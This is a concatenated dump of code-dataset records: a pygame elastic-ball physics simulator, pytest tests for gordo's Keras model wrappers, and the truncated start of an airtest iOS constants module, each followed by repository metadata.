0\n\n\ndef get_dis(x1, y1, x2, y2):\n return ((x2 - x1) ** 2 + (y2 - y1) ** 2) ** 0.5\n\n\ndef get_vec(x1, y1, x2, y2):\n vec_x, vec_y = x2 - x1, y2 - y1\n vec_len = get_dis(x1, y1, x2, y2)\n if vec_len > EPS:\n vec_x /= vec_len\n vec_y /= vec_len\n return vec_x, vec_y\n\n\nclass MainGame:\n _display = pygame.display\n window = None\n ball_list = []\n elastic_list = []\n clock = pygame.time.Clock()\n collides = []\n hide_ball0 = False\n fps_pause = False\n\n def start_game(self):\n self._display.init()\n self.window = self._display.set_mode([SCREEN_WIDTH, SCREEN_HEIGHT])\n self.create_my_ball()\n self.create_dead_ball()\n # self.elastic_list.append(Elastic(self.ball_list[0],\n # self.ball_list[1],\n # balance_len=1.))\n\n def legal(x, y):\n return 0 <= x < RIGID and 0 <= y < RIGID\n\n # 生成弹性链\n for i in range(RIGID * RIGID):\n x = i // RIGID\n y = i % RIGID\n for x1 in range(x - RIGID_ELASTIC_NUM, x + RIGID_ELASTIC_NUM + 1):\n for y1 in range(y - RIGID_ELASTIC_NUM, y + RIGID_ELASTIC_NUM + 1):\n if (not legal(x1, y1)) or (x1 == x and y1 == y):\n continue\n num = x1 * RIGID + y1\n if i < num:\n self.elastic_list.append(Elastic(self.ball_list[i],\n self.ball_list[num],\n get_dis(x, y, x1, y1) * RIGID_DIS))\n\n self._display.set_caption(\"球球模拟器\")\n\n last_time = 0\n max_power = 0.\n while True:\n self.clock.tick(FPS)\n\n time_begin = time.time()\n\n self.window.fill(COLOR_BG)\n\n self.get_event()\n if not self.fps_pause:\n self.update_all_balls(FPS_TIME)\n\n for d in self.ball_list:\n d.display(self.window) # !!!\n for e in self.elastic_list:\n e.display(self.window)\n self._display.update()\n\n time_end = time.time()\n\n max_power = max(max_power, (time_end - time_begin) / FPS_TIME)\n\n timestamp = int(round(time.time() * 1000))\n if timestamp - last_time > 500:\n last_time = timestamp\n print('FPS:', self.clock.get_fps())\n print('Power used:', max_power * 100, '%')\n max_power = 0.\n\n def create_my_ball(self):\n # my = Ball(random.random() * (SCREEN_WIDTH / PIX_PER_METER),\n # random.random() * ((SCREEN_HEIGHT / 2 + 10) / PIX_PER_METER),\n # # 2,\n # img_src=IMG_SRC1, mass=WEIGHT1)\n\n my = Ball(RIGID_DIS, RIGID_DIS,\n img_src=IMG_SRC1, mass=WEIGHT1)\n self.ball_list.append(my) # 可操作的球员总是在 0 号\n\n def create_dead_ball(self):\n # for i in range(BALL_COUNT):\n # self.ball_list.append(Ball(random.random() * (SCREEN_WIDTH / PIX_PER_METER),\n # random.random() * ((SCREEN_HEIGHT / 2 + 10) / PIX_PER_METER),\n # # 2,\n # img_src=IMG_SRC2, mass=WEIGHT2))\n for i in range(BALL_COUNT):\n x = (i + 1) // RIGID\n y = (i + 1) % RIGID\n self.ball_list.append(Ball(RIGID_DIS + x * RIGID_DIS, RIGID_DIS + y * RIGID_DIS,\n img_src=IMG_SRC2, mass=WEIGHT2))\n\n def collide_split(self, node_list: list, x1, y1, x2, y2):\n if len(node_list) == 0:\n return\n\n points = [(x1, y1), (x1, y2), (x2, y2), (x2, y1)]\n pygame.draw.lines(self.window, (0, 127, 0), True, points, 1)\n pygame.draw.line(self.window, (255, 255, 255),\n (25, 50), (25 + PIX_PER_METER, 50), 1)\n\n if len(node_list) <= COLLIDE_TREE_MIN_SIZE:\n for d1 in node_list:\n for d2 in node_list:\n if (d1, d2) in self.collides or (d2, d1) in self.collides:\n continue\n if d1 != d2 and d1.hit_other(d2):\n self.collides.append((d1, d2))\n return\n father_list = []\n son_list = []\n x0 = (x1 + x2) / 2\n y0 = (y1 + y2) / 2\n for d in node_list:\n if d.rect.left <= x0 < d.rect.left + d.rect.width or d.rect.top <= y0 < d.rect.top + d.rect.height:\n father_list.append(d)\n else:\n son_list.append(d)\n for d1 in father_list:\n for d2 in node_list:\n if (d1, d2) in self.collides or (d2, d1) in self.collides:\n continue\n if d1 != d2 and d1.hit_other(d2):\n self.collides.append((d1, d2))\n son_list1 = []\n son_list2 = []\n son_list3 = []\n son_list4 = []\n for d in son_list:\n if d.rect.left + d.rect.width < 0. or d.rect.left > SCREEN_WIDTH or \\\n d.rect.top + d.rect.height < 0. or d.rect.top > SCREEN_HEIGHT:\n continue\n if d.rect.left > x0 and d.rect.top > y0:\n son_list1.append(d)\n elif d.rect.left + d.rect.width <= x0 and d.rect.top > y0:\n son_list2.append(d)\n elif d.rect.left + d.rect.width <= x0 and d.rect.top + d.rect.height <= y0:\n son_list3.append(d)\n elif d.rect.left > x0 and d.rect.top + d.rect.height <= y0:\n son_list4.append(d)\n self.collide_split(son_list1, x0, y0, x2, y2)\n self.collide_split(son_list2, x1, y0, x0, y2)\n self.collide_split(son_list3, x1, y1, x0, y0)\n self.collide_split(son_list4, x0, y1, x2, y0)\n\n def inter_gravity2(self):\n g_sum_x, g_sum_y = 0., 0.\n m_sum = 0.\n for d in self.ball_list:\n g_sum_x += d.x * d.mass\n g_sum_y += d.y * d.mass\n m_sum += d.mass\n for d in self.ball_list:\n g_sum_x_no_d = g_sum_x - d.x * d.mass\n g_sum_y_no_d = g_sum_y - d.y * d.mass\n m_sum_no_d = m_sum - d.mass\n center_x, center_y = g_sum_x_no_d / m_sum_no_d, g_sum_y_no_d / m_sum_no_d\n dis = ((center_x - d.x) ** 2 + (center_y - d.y) ** 2) ** 0.5\n vec_x, vec_y = center_x - d.x, center_y - d.y\n vec_len = (vec_x ** 2 + vec_y ** 2) ** 0.5\n vec_x /= vec_len\n vec_y /= vec_len\n f = INTER_G * d.mass * m_sum_no_d / dis ** 2\n d.speed_x += f * vec_x / d.mass * FPS_TIME\n d.speed_y += f * vec_y / d.mass * FPS_TIME\n\n def inter_gravity(self):\n inter = []\n for d1 in self.ball_list:\n for d2 in self.ball_list:\n if d1 != d2 and (d1, d2) not in inter and (d2, d1) not in inter:\n if self.hide_ball0 and (d1 == self.ball_list[0] or d2 == self.ball_list[0]):\n continue\n if CANCEL_INTER_GRAVITY_WHEN_COLLIDE and pygame.sprite.collide_mask(d1, d2):\n continue\n dis = ((d1.x - d2.x) ** 2 + (d1.y - d2.y) ** 2) ** 0.5\n vec_x, vec_y = d2.x - d1.x, d2.y - d1.y\n vec_len = (vec_x ** 2 + vec_y ** 2) ** 0.5\n vec_x /= vec_len\n vec_y /= vec_len\n f = INTER_G * d1.mass * d2.mass / dis ** 2\n d1.speed_x += f * vec_x / d1.mass * FPS_TIME\n d1.speed_y += f * vec_y / d1.mass * FPS_TIME\n d2.speed_x += -f * vec_x / d2.mass * FPS_TIME\n d2.speed_y += -f * vec_y / d2.mass * FPS_TIME\n inter.append((d1, d2))\n\n def update_all_balls(self, t):\n\n for d in self.ball_list:\n d.move()\n d.hit_edge()\n for e in self.elastic_list:\n e.affect(t)\n\n self.collides = []\n self.collide_split(self.ball_list, 0, 0, SCREEN_WIDTH, SCREEN_HEIGHT)\n\n # for d1 in self.ball_list:\n # for d2 in self.ball_list:\n # if (d1, d2) in self.collides or (d2, d1) in self.collides:\n # continue\n # if d1 != d2 and d1.hit_other(d2):\n # self.collides.append((d1, d2))\n\n if INTER_GRAVITY_ON:\n self.inter_gravity()\n\n def get_event(self):\n event_list = pygame.event.get()\n for event in event_list:\n if event.type == pygame.QUIT:\n self.end_game()\n di_di = {\n pygame.K_LEFT: 'L',\n pygame.K_RIGHT: 'R',\n pygame.K_UP: 'U',\n pygame.K_DOWN: 'D',\n }\n\n if event.type == pygame.KEYDOWN:\n if event.key in di_di:\n if KEY_ACC_FOR_ALL:\n for ball in self.ball_list:\n ball.power[di_di[event.key]] = True\n else:\n self.ball_list[0].power[di_di[event.key]] = True\n elif event.key == pygame.K_g:\n self.hide_ball0 = not self.hide_ball0\n if self.hide_ball0:\n self.ball_list[0].image.set_alpha(99)\n else:\n self.ball_list[0].image.set_alpha(255)\n elif event.key == pygame.K_SPACE:\n self.fps_pause = not self.fps_pause\n\n elif event.type == pygame.KEYUP:\n if event.key in di_di:\n if KEY_ACC_FOR_ALL:\n for ball in self.ball_list:\n ball.power[di_di[event.key]] = False\n else:\n self.ball_list[0].power[di_di[event.key]] = False\n\n @staticmethod\n def end_game():\n exit()\n\n\nclass BaseItem(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n\n\nclass Ball(BaseItem):\n def __init__(self, x, y, img_src='pic/circle.png', mass=1.0, elastic_list=[]):\n super(Ball, self).__init__()\n self.mass = mass\n self.image = pygame.image.load(img_src)\n self.x = x\n self.y = y\n self.rect = self.image.get_rect()\n self.radius = self.rect.width / 2 / PIX_PER_METER\n self.x_last = x\n self.y_last = y\n self.speed_x = 0.\n self.speed_y = 0.\n self.speed_x_last = self.speed_x\n self.speed_y_last = self.speed_y\n self.mask = pygame.mask.from_surface(self.image)\n self.power = {\n 'U': False,\n 'L': False,\n 'D': False,\n 'R': False\n }\n\n def move(self):\n self.x_last = self.x\n self.y_last = self.y\n self.speed_x_last = self.speed_x\n self.speed_y_last = self.speed_y\n\n self.x += self.speed_x * FPS_TIME\n self.y += self.speed_y * FPS_TIME\n\n vec_speed_len = (self.speed_x ** 2 + self.speed_y ** 2) ** 0.5\n if abs(vec_speed_len) > EPS:\n norm_speed_x, norm_speed_y = self.speed_x / \\\n vec_speed_len, self.speed_y / vec_speed_len\n # 摩擦力\n self.speed_x += -MU * DOWNWARD_G * norm_speed_x * FPS_TIME\n self.speed_y += -MU * DOWNWARD_G * norm_speed_y * FPS_TIME\n # 空气阻力\n self.speed_x += \\\n -K_AIR * vec_speed_len ** 2 * self.radius ** 2 * \\\n math.pi * norm_speed_x / self.mass * FPS_TIME\n self.speed_y += \\\n -K_AIR * vec_speed_len ** 2 * self.radius ** 2 * \\\n math.pi * norm_speed_y / self.mass * FPS_TIME\n\n # 阻力过度\n if (self.speed_x_last > EPS) != (self.speed_x > EPS):\n self.speed_x = 0.\n if (self.speed_y_last > EPS) != (self.speed_y > EPS):\n self.speed_y = 0.\n\n if self.power['L']:\n self.speed_x += -KEY_ACC * FPS_TIME\n if self.power['R']:\n self.speed_x += KEY_ACC * FPS_TIME\n if self.power['U']:\n self.speed_y += -KEY_ACC * FPS_TIME\n if self.power['D']:\n self.speed_y += KEY_ACC * FPS_TIME\n\n if DOWNWARD_GRAVITY_ON:\n self.speed_y += DOWNWARD_G * FPS_TIME\n\n self.rect.left = int(self.x * PIX_PER_METER - self.rect.width / 2)\n self.rect.top = int(self.y * PIX_PER_METER - self.rect.height / 2)\n\n def receive_f(self, f, vec_x, vec_y, t):\n a = f / self.mass\n self.speed_x += a * vec_x * t\n self.speed_y += a * vec_y * t\n\n def hit_other(self, other) -> bool:\n # 弹性碰撞\n if pygame.sprite.collide_mask(self, other):\n vec_x, vec_y = other.x - self.x, other.y - self.y\n vec_speed_x, vec_speed_y = other.speed_x - \\\n self.speed_x, other.speed_y - self.speed_y\n if vec_x * vec_speed_x + vec_y * vec_speed_y > 0.:\n # 相对速度趋势为远离则不计算碰撞\n return False\n vec_len = (vec_x ** 2 + vec_y ** 2) ** 0.5\n if abs(vec_len) > EPS:\n vec_x, vec_y = vec_x / vec_len, vec_y / vec_len\n\n v_cross1 = self.speed_x * vec_x + self.speed_y * vec_y\n vx1, vy1 = v_cross1 * vec_x, v_cross1 * vec_y\n v_ori_x1, v_ori_y1 = self.speed_x - vx1, self.speed_y - vy1\n # (vx1, vy1, v_ori_x1, v_ori_y1)\n\n v_cross2 = other.speed_x * vec_x + other.speed_y * vec_y\n vx2, vy2 = v_cross2 * vec_x, v_cross2 * vec_y\n v_ori_x2, v_ori_y2 = other.speed_x - vx2, other.speed_y - vy2\n # print(vx2, vy2, v_ori_x2, v_ori_y2)\n # print('----')\n\n # 回退到上一位置 并更新碰撞位置\n if AVOID_INTER_SUBMERGE:\n self.x, self.y = self.x_last, self.y_last\n other.x += other.speed_x * FPS_TIME\n other.y += other.speed_y * FPS_TIME\n\n self.rect.left = int(self.x * PIX_PER_METER - self.rect.width / 2)\n self.rect.top = int(self.y * PIX_PER_METER - self.rect.height / 2)\n other.rect.left = int(\n other.x * PIX_PER_METER - other.rect.width / 2)\n other.rect.top = int(\n other.y * PIX_PER_METER - other.rect.height / 2)\n\n self.speed_x = \\\n v_ori_x1 + ((self.mass - other.mass) * vx1 + 2 * other.mass * vx2) / \\\n (self.mass + other.mass)\n other.speed_x = \\\n v_ori_x2 + ((other.mass - self.mass) * vx2 + 2 * self.mass * vx1) / \\\n (self.mass + other.mass)\n self.speed_y = \\\n v_ori_y1 + ((self.mass - other.mass) * vy1 + 2 * other.mass * vy2) / \\\n (self.mass + other.mass)\n other.speed_y = \\\n v_ori_y2 + ((other.mass - self.mass) * vy2 + 2 * self.mass * vy1) / \\\n (self.mass + other.mass)\n return True\n return False\n\n def hit_edge(self):\n if self.x * PIX_PER_METER - self.rect.width / 2 < 0:\n if AVOID_EDGE_SUBMERGE:\n self.x = self.rect.width / 2 / PIX_PER_METER\n if self.speed_x < 0.:\n self.speed_x *= -1.\n\n if self.x * PIX_PER_METER + self.rect.width / 2 > SCREEN_WIDTH:\n if AVOID_EDGE_SUBMERGE:\n self.x = (SCREEN_WIDTH - self.rect.width / 2) / PIX_PER_METER\n if self.speed_x > 0.:\n self.speed_x *= -1.\n\n if self.y * PIX_PER_METER - self.rect.height / 2 < 0:\n if AVOID_EDGE_SUBMERGE:\n self.y = self.rect.height / 2 / PIX_PER_METER\n if self.speed_y < 0.:\n self.speed_y *= -1\n\n if self.y * PIX_PER_METER + self.rect.height / 2 > SCREEN_HEIGHT:\n if AVOID_EDGE_SUBMERGE:\n self.y = (SCREEN_HEIGHT - self.rect.height / 2) / PIX_PER_METER\n if self.speed_y > 0.:\n self.speed_y *= -1. # Latex 规则\n\n def display(self, window):\n window.blit(self.image, self.rect)\n\n\nclass Elastic:\n def __init__(self, d1: Ball, d2: Ball, balance_len):\n self.d1 = d1\n self.d2 = d2\n self.balance_len = balance_len\n\n def affect(self, t):\n # 从 1 指向 2\n vec_x, vec_y = get_vec(self.d1.x, self.d1.y, self.d2.x, self.d2.y)\n dis = get_dis(self.d1.x, self.d1.y, self.d2.x, self.d2.y)\n f = K_ELASTIC * (dis - self.balance_len)\n self.d1.receive_f(f, vec_x, vec_y, t)\n self.d2.receive_f(f, -vec_x, -vec_y, t)\n\n def display(self, window: pygame.Surface):\n pygame.draw.line(window, (255, 255, 255),\n (self.d1.x * PIX_PER_METER, self.d1.y * PIX_PER_METER),\n (self.d2.x * PIX_PER_METER, self.d2.y * PIX_PER_METER),\n 2)\n\n\ndef collide(ball1: Ball, ball2: Ball):\n return ((ball1.x - ball2.x) ** 2 + (ball1.y - ball2.y) ** 2) ** 0.5 < ball1.radius + ball2.radius\n\n\ndef code(x, y):\n x = y ** 2\n\n\n# class MyBall(Ball):\n# def __init__(self, x, y):\n# super(MyBall, self).__init__(x, y)\n#\n#\n# class DeadBall(Ball):\n# def __init__(self, x, y):\n# super(DeadBall, self).__init__(x, y)\n\n\ndef main():\n game = MainGame()\n game.start_game()\n\n\nmain()\n","repo_name":"julyfun/ball_crash","sub_path":"elastic.py","file_name":"elastic.py","file_ext":"py","file_size_in_byte":18240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"6988451428","text":"# -*- coding: utf-8 -*-\n\nimport pickle\nimport logging\nimport pydoc\n\nimport pytest\nimport numpy as np\nimport xarray as xr\n\nfrom sklearn.exceptions import NotFittedError\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.model_selection import cross_val_score, TimeSeriesSplit\n\nfrom tensorflow.keras.wrappers.scikit_learn import KerasRegressor as BaseWrapper\nfrom tensorflow.keras.callbacks import EarlyStopping\n\nfrom tests.utils import get_model\nfrom gordo.machine.model.models import (\n KerasLSTMAutoEncoder,\n KerasLSTMForecast,\n KerasLSTMBaseEstimator,\n KerasBaseEstimator,\n KerasAutoEncoder,\n create_keras_timeseriesgenerator,\n)\nfrom gordo.machine.model.factories import lstm_autoencoder\nfrom gordo.machine.model.base import GordoBase\nfrom gordo.machine.model.register import register_model_builder\n\n\nlogger = logging.getLogger(__name__)\n\n\n# Generator of model types to each available model kind for that type\n# ie. (('KerasAutoEncoder', 'hourglass'), ('KerasAutoEncoder', 'symmetric'), ...)\nMODEL_COMBINATIONS = list(\n (model, kind)\n for model in register_model_builder.factories.keys()\n for kind in register_model_builder.factories[model].keys()\n)\n\n# Generator of model types to one kind, rather than all combinations of kinds per type\nMODEL_SINGLE_KIND = list(\n (model, sorted(register_model_builder.factories[model].keys())[0])\n for model in register_model_builder.factories.keys()\n)\n\n\n@pytest.mark.parametrize(\"BaseModel\", [KerasLSTMBaseEstimator, KerasBaseEstimator])\ndef test_base_class_models(BaseModel):\n \"\"\"\n Test that the ABC cannot be instantiated, in that they require some implementation\n \"\"\"\n with pytest.raises(TypeError):\n BaseModel()\n\n\n@pytest.mark.parametrize(\"n_features_out\", (2, 3))\n@pytest.mark.parametrize(\"model,kind\", MODEL_SINGLE_KIND)\ndef test_keras_autoencoder_scoring(model, kind, n_features_out):\n \"\"\"\n Test the KerasAutoEncoder and KerasLSTMAutoEncoder have a working scoring function\n \"\"\"\n Model = pydoc.locate(f\"gordo.machine.model.models.{model}\")\n model = Pipeline([(\"model\", Model(kind=kind))])\n X = np.random.random((8, 2))\n\n # Should be able to deal with y output different than X input features\n y = np.random.random((8, n_features_out))\n\n with pytest.raises(NotFittedError):\n model.score(X, y)\n\n model.fit(X, y)\n score = model.score(X, y)\n logger.info(f\"Score: {score:.4f}\")\n\n\n@pytest.mark.parametrize(\"model,kind\", MODEL_SINGLE_KIND)\ndef test_keras_autoencoder_crossval(model, kind):\n \"\"\"\n Test ability for cross validation\n \"\"\"\n Model = pydoc.locate(f\"gordo.machine.model.models.{model}\")\n model = Pipeline([(\"model\", Model(kind=kind))])\n\n X = np.random.random(size=(15, 2))\n y = X.copy()\n\n scores = cross_val_score(\n model, X, y, cv=TimeSeriesSplit(n_splits=2, max_train_size=2)\n )\n assert isinstance(scores, np.ndarray)\n logger.info(f\"Mean score: {scores.mean():.4f} - Std score: {scores.std():.4f}\")\n\n\n@pytest.mark.parametrize(\"model,kind\", MODEL_COMBINATIONS)\ndef test_keras_type_config(model, kind):\n \"\"\"\n Test creating a keras based model from config\n \"\"\"\n config = {\"type\": model, \"kind\": kind}\n\n # Ensure we can poke the model the same\n model_out = get_model(config)\n assert isinstance(model_out, GordoBase)\n assert isinstance(model_out, BaseWrapper)\n assert isinstance(model_out, pydoc.locate(f\"gordo.machine.model.models.{model}\"))\n\n\n@pytest.mark.parametrize(\"model,kind\", MODEL_SINGLE_KIND)\ndef test_save_load(model, kind):\n config = {\"type\": model, \"kind\": kind}\n\n # Have to call fit, since model production is lazy\n X = np.random.random(size=10).reshape(5, 2)\n y = X.copy()\n\n # AutoEncoder is fine without a y target\n config[\"type\"] = model\n model_out = get_model(config)\n if model == KerasLSTMForecast:\n assert \"forecast_steps\" in model_out.get_metadata()\n\n assert \"history\" not in model_out.get_metadata()\n model_out.fit(X, y)\n assert \"history\" in model_out.get_metadata()\n\n xTest = np.random.random(size=6).reshape(3, 2)\n xHat = model_out.predict(xTest)\n\n model_out_clone = pickle.loads(pickle.dumps(model_out))\n\n # Assert parameters are the same.\n assert model_out_clone.get_params() == model_out_clone.get_params()\n\n # Assert it maintained the state by ensuring predictions are the same\n assert np.allclose(xHat.flatten(), model_out_clone.predict(xTest).flatten())\n\n assert \"history\" in model_out.get_metadata()\n assert (\n model_out.get_metadata() == model_out_clone.get_metadata()\n ), \"Metadata from model is not same after saving and loading\"\n\n # Assert that epochs list, history dict and params dict in\n # the History object are the same\n assert (\n model_out.history.epoch == model_out_clone.history.epoch\n ), \"Epoch lists differ between original and loaded model history\"\n\n assert (\n model_out.history.history == model_out_clone.history.history\n ), \"History dictionary with losses and accuracies differ between original and loaded model history\"\n\n assert (\n model_out.history.params == model_out_clone.history.params\n ), \"Params dictionaries differ between original and loaded model history\"\n\n\ndef test_lookback_window_ae_valueerror_during_fit():\n \"\"\"\n Assert (for LSTMAutoEncoder) ValueError\n is raised in fit method if lookback_window > number of readings (rows of X)\n \"\"\"\n lookback_window = 11\n with pytest.raises(ValueError):\n model = KerasLSTMAutoEncoder(\n kind=lstm_autoencoder.lstm_model, lookback_window=lookback_window\n )\n X, y = np.random.rand(10), np.random.rand(10)\n model.fit(X, y)\n\n\ndef test_keras_ae_reshapes_array():\n \"\"\"\n Asserts KerasLSTMAutoEncoder accepts an array of elements, which it will\n reshape into the matrix of single elements it needs\n \"\"\"\n model = KerasLSTMAutoEncoder(kind=lstm_autoencoder.lstm_model)\n X, y = np.random.rand(100), np.random.rand(100)\n model.fit(X, y)\n model.predict(X)\n\n\ndef test_keras_forecast_reshapes_array():\n \"\"\"\n Asserts KerasLSTMForecast accepts an array of elements, which it will\n reshape into the matrix of single elements it needs\n \"\"\"\n model = KerasLSTMForecast(kind=lstm_autoencoder.lstm_model)\n X, y = np.random.rand(100), np.random.rand(100)\n model.fit(X, y)\n model.predict(X)\n\n\ndef test_lookback_window_ae_valueerror_during_predict():\n \"\"\"\n Assert (for LSTMAutoEncoder) ValueError\n is raised in fit method if lookback_window > number of readings (rows of X)\n \"\"\"\n model = KerasLSTMAutoEncoder(kind=lstm_autoencoder.lstm_model, lookback_window=3)\n xTrain, yTrain = np.random.random(size=(4, 2)), np.random.random(size=(4, 2))\n model.fit(xTrain, yTrain)\n with pytest.raises(ValueError):\n model.predict(xTrain[-3:-1, :])\n\n\n@pytest.mark.parametrize(\"lookback_window\", (5, 6))\ndef test_lookback_window_forecast_valueerror_during_fit(lookback_window):\n \"\"\"\n Assert (for LSTMForecast) ValueError is raised\n in fit method if lookback_window >= number of readings (rows of X)\n \"\"\"\n model = KerasLSTMForecast(\n kind=lstm_autoencoder.lstm_model, lookback_window=lookback_window\n )\n with pytest.raises(ValueError):\n X = np.random.random(size=(5, 2))\n y = X.copy()\n model.fit(X, y)\n\n\n@pytest.mark.parametrize(\"lookback_window\", (5, 6))\ndef test_lookback_window_forecast_valueerror_during_predict(lookback_window: int):\n \"\"\"\n Assert (for LSTMForecast) ValueError is raised\n in fit method if lookback_window >= number of readings (rows of X)\n \"\"\"\n X = np.random.random(size=(5, 2))\n y = X.copy()\n model = KerasLSTMForecast(\n kind=lstm_autoencoder.lstm_model, lookback_window=lookback_window\n )\n with pytest.raises(ValueError):\n model.fit(X, y)\n\n\ndef test_create_keras_timeseriesgenerator_lb3_loah0_bs2():\n \"\"\"Check that right output is generated from create_keras_timeseriesgenerator\"\"\"\n X = np.array([[0, 1], [2, 3], [4, 5], [6, 7], [8, 9]])\n y = X.copy()\n gen = create_keras_timeseriesgenerator(\n X, y, batch_size=2, lookback_window=3, lookahead=0\n )\n batch_1 = gen[0]\n batch_2 = gen[1]\n\n batch_1_x = batch_1[0].tolist()\n batch_1_y = batch_1[1].tolist()\n\n batch_2_x = batch_2[0].tolist()\n batch_2_y = batch_2[1].tolist()\n\n assert [[[0, 1], [2, 3], [4, 5]], [[2, 3], [4, 5], [6, 7]]] == batch_1_x\n assert [[4, 5], [6, 7]] == batch_1_y\n\n assert [[[4, 5], [6, 7], [8, 9]]] == batch_2_x\n assert [[8, 9]] == batch_2_y\n\n\ndef test_create_keras_timeseriesgenerator_lb2_loah1_bs2():\n \"\"\"\n Check right output is generated from create_keras_timeseriesgenerator\n We use lookback_window 2 to get some more interesting batches with lookahead 1\n \"\"\"\n X = np.array([[0, 1], [2, 3], [4, 5], [6, 7], [8, 9]])\n y = X.copy()\n gen = create_keras_timeseriesgenerator(\n X, y, batch_size=2, lookback_window=2, lookahead=1\n )\n batch_1 = gen[0]\n batch_2 = gen[1]\n\n batch_1_x = batch_1[0].tolist()\n batch_1_y = batch_1[1].tolist()\n\n batch_2_x = batch_2[0].tolist()\n batch_2_y = batch_2[1].tolist()\n\n assert [[[0, 1], [2, 3]], [[2, 3], [4, 5]]] == batch_1_x\n assert [[4, 5], [6, 7]] == batch_1_y\n\n assert [[[4, 5], [6, 7]]] == batch_2_x\n assert [[8, 9]] == batch_2_y\n\n\ndef test_create_keras_timeseriesgenerator_lb3_loah2_bs2():\n \"\"\"\n Check right output is generated from create_keras_timeseriesgenerator\n We use lookback_window 2 to get some more interesting batches with lookahead 1\n \"\"\"\n X = np.array([[0, 1], [2, 3], [4, 5], [6, 7], [8, 9]])\n y = X.copy()\n gen = create_keras_timeseriesgenerator(\n X, y, batch_size=2, lookback_window=2, lookahead=2\n )\n batch_1 = gen[0]\n batch_2 = gen[1]\n\n batch_1_x = batch_1[0].tolist()\n batch_1_y = batch_1[1].tolist()\n\n batch_2_x = batch_2[0].tolist()\n batch_2_y = batch_2[1].tolist()\n\n assert [[[0, 1], [2, 3]], [[2, 3], [4, 5]]] == batch_1_x\n assert [[6, 7], [8, 9]] == batch_1_y\n\n assert [] == batch_2_x # No more elements left\n assert [] == batch_2_y\n\n\ndef test_create_keras_timeseriesgenerator_raise_error_on_neg_lookahead():\n \"\"\"Check create_keras_timeseriesgenerator raises an error on negative lookahead\"\"\"\n X = np.array([[0, 1]])\n y = X.copy()\n with pytest.raises(ValueError):\n create_keras_timeseriesgenerator(\n X, y, batch_size=2, lookback_window=2, lookahead=-1\n )\n\n\ndef test_lstmae_predict_output():\n \"\"\"\n test for KerasLSTMAutoEncoder\n - test dimension of output\n - test that first half of output is testing data\n \"\"\"\n xTrain, yTrain = np.random.random(size=(5, 3)), np.random.random((5, 3))\n lookback_window = 3\n model = KerasLSTMAutoEncoder(\n kind=lstm_autoencoder.lstm_model, lookback_window=lookback_window\n )\n model = model.fit(xTrain, yTrain)\n xTest = np.random.random(size=(4, 3))\n out = model.predict(xTest)\n assert out.shape == (2, 3)\n\n\ndef test_keras_autoencoder_fits_callbacks():\n model = KerasAutoEncoder(\n kind=\"feedforward_hourglass\",\n batch_size=128,\n callbacks=[\n {\n \"tensorflow.keras.callbacks.EarlyStopping\": {\n \"monitor\": \"val_loss\",\n \"patience\": 10,\n }\n }\n ],\n )\n sk_params = model.sk_params\n assert len(sk_params[\"callbacks\"]) == 1\n first_callback = sk_params[\"callbacks\"][0]\n assert isinstance(first_callback, EarlyStopping)\n assert first_callback.monitor == \"val_loss\"\n assert first_callback.patience == 10\n\n\ndef test_parse_module_path():\n assert KerasBaseEstimator.parse_module_path(\"gordo_client.Client\") == (\n \"gordo_client\",\n \"Client\",\n )\n assert KerasBaseEstimator.parse_module_path(\"gordo.Client\") == (\"gordo\", \"Client\")\n assert KerasBaseEstimator.parse_module_path(\"Client\") == (None, \"Client\")\n\n\ndef test_wrong_kind():\n with pytest.raises(ValueError):\n KerasAutoEncoder(kind=\"my_feedforward_hourglass\")\n with pytest.raises(ValueError):\n KerasAutoEncoder(kind=\"not.existing.module.encoder\")\n\n\ndef test_get_n_features_out():\n a = np.array([[1], [2]])\n assert KerasAutoEncoder.get_n_features_out(a) == 1\n a = np.array([[[2, 3]], [[3, 4]]])\n assert KerasAutoEncoder.get_n_features_out(a) == (1, 2)\n a = np.array([1, 2, 3])\n with pytest.raises(ValueError):\n KerasAutoEncoder.get_n_features_out(a)\n\n\ndef test_get_n_features():\n a = np.array([[1], [2]])\n assert KerasAutoEncoder.get_n_features(a) == 1\n a = xr.DataArray(np.array([[[2, 3]], [[3, 4]]]))\n assert KerasAutoEncoder.get_n_features(a) == (1, 2)\n a = np.array([[[2, 3]], [[3, 4]]])\n assert KerasAutoEncoder.get_n_features(a) == 2\n a = np.array([1, 2, 3])\n with pytest.raises(ValueError):\n KerasAutoEncoder.get_n_features(a)\n\n\ndef test_import_kind():\n model = KerasBaseEstimator(\n kind=\"gordo.machine.model.factories.feedforward_autoencoder.feedforward_hourglass\"\n )\n X, y = np.random.rand(10, 10), np.random.rand(10, 10)\n model.fit(X, y)\n\n\ndef test_for_wrong_kind_import():\n model = KerasBaseEstimator(kind=\"gordo.machine.model.factories.wrong_autoencoder\")\n X, y = np.random.rand(10, 10), np.random.rand(10, 10)\n with pytest.raises(ValueError):\n model.fit(X, y)\n","repo_name":"equinor/gordo","sub_path":"tests/gordo/machine/model/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":13442,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"38"} +{"seq_id":"2936402288","text":"# -*- coding: utf-8 -*-\nimport os\nimport re\nimport wda\nfrom airtest.utils.compat import decode_path\n\n\nTHISPATH = decode_path(os.path.dirname(os.path.realpath(__file__)))\nDEFAULT_IPROXY_PATH = {\n \"Windows\": os.path.join(THISPATH, \"iproxy\", \"windows\", \"iproxy.exe\"),\n \"Darwin\": os.path.join(THISPATH, \"iproxy\", \"mac\", \"iproxy\"),\n}\nDEBUG = True\nIP_PATTERN = re.compile(r'(\\d+\\.){3}\\d+')\n\n# When some devices (6P/7P/8P) are in landscape mode, the desktop will also change to landscape mode,\n# but the click coordinates are vertical screen coordinates and require special processing\n# 部分设备(6P/7P/8P)在横屏时,桌面也会变成横屏,但是点击坐标是竖屏坐标,需要特殊处理\n# 由于wda不能获取到手机型号,暂时用屏幕尺寸来识别是否是plus手机\n# https://developer.apple.com/design/human-interface-guidelines/ios/visual-design/adaptivity-and-layout/\nLANDSCAPE_PAD_RESOLUTION = [(1242, 2208)]\n\n\nclass CAP_METHOD(object):\n MINICAP = \"MINICAP\"\n WDACAP = \"WDACAP\"\n MJPEG = \"MJPEG\"\n\n\n# wda default mjpeg server port number\nDEFAULT_MJPEG_PORT = 9100\n\n# now touch and ime only support wda\nclass TOUCH_METHOD(object):\n WDATOUCH = \"WDATOUCH\"\n\n\nclass 